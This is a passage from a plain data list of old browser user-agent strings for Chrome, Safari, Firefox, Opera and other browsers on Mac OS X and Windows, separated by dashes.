(Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.0 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.451.0 Safari/534.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; fr-FR) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) 
AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.639.0 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/533.4 (KHTML, like Gecko) Version/4.1 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.7 Safari/533.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 -Mozilla/5.0 (Macintosh; U; Mac OS X 10_5_7; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5 -Mozilla/5.0 (Macintosh; U; Mac OS X 10_6_1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-GB; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081212 Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; da-dk) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de-de) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; hu-hu) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; nl-nl) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; tr) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) 
Version/4.0.3 Safari/531.9 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9.2009 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1) Gecko/20060214 Camino/1.0 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.3) Gecko/20060427 Camino/1.0.1 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.4) Gecko/20060613 Camino/1.0.2 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/124 (KHTML, like Gecko) Safari/125 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.51 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.8) Gecko/20051107 Camino/1.0b1 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312 -Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.43 Safari/534.24 -Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.706.0 Safari/534.25 -Mozilla/5.0 (Windows NT 5.1; U; ; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52 -Mozilla/5.0 (Windows NT 5.1; U; Firefox/3.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 -Mozilla/5.0 (Windows NT 5.1; U; Firefox/4.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 -Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 -Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 -Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52 -Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.50 -Mozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 -Mozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.61 -Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.22 -Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.24 -Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.26 -Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 -Mozilla/5.0 (Windows NT 5.1; U; es-la; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27 -Mozilla/5.0 (Windows NT 5.1; U; pl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00 -Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50 -Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20091102 Firefox/3.5.5 -Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 -Mozilla/5.0 (Windows NT 5.1; 
U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70 -Mozilla/5.0 (Windows NT 5.1; rv:2.0b8pre) Gecko/20101127 Firefox/4.0b8pre -Mozilla/5.0 (Windows NT 5.2; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27 -Mozilla/5.0 (Windows NT 5.2; U; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70 -Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24 -Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 -Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 -Mozilla/5.0 (Windows NT 6.0; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 -Mozilla/5.0 (Windows NT 6.0; U; ja; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00 -Mozilla/5.0 (Windows NT 6.0; U; tr; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10 -Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24 -Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.694.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.697.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1; U; en-GB; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.53 Safari/534.30 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20100101 Firefox/4.0b7 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101128 Firefox/4.0b8pre -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre -Mozilla/5.0 (Windows NT 6.1; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre Firefox/4.0b6pre -Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre -Mozilla/5.0 (Windows NT) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 -Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; el-GR) -Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) -Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US)) -Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) -Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0 -Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1) Gecko/20061010 
Firefox/2.0 -Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0 -Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20020508 Netscape6/6.1 -Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.0.2) Gecko/2008092313 Firefox/3.1.6 -Mozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; ; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 -Mozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) Chrome/4.0.223.3 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0.1pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.2pre) Gecko/2008082305 Firefox/3.0.2pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Firefox/3.0.8) -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.8) Gecko/2009032609 Firefox/3.07 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.30) -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.648) -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9b3) Gecko/2008020514 Opera 9.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 ( .NET CLR 3.5.30729; .NET4.0E) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/525.13. 
-Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13(KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.152.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.155.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.18 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.50 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.55 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.10 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.11 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.11 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.4 (KHTML, like Gecko) Chrome/0.3.155.0 Safari/528.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.0 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.0 Version/3.2.1 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.9 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.9 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.169.0 Safari/530.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.170.0 Safari/530.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.42 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) 
Chrome/2.0.172.43 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.8 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.0 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.177.0 Safari/530.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.177.0 Safari/530.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.177.1 Safari/530.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.178.0 Safari/530.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/3.0.191.0 Safari/531.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/3.0.191.3 Safari/531.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.17 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.20 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.24 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.201.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 
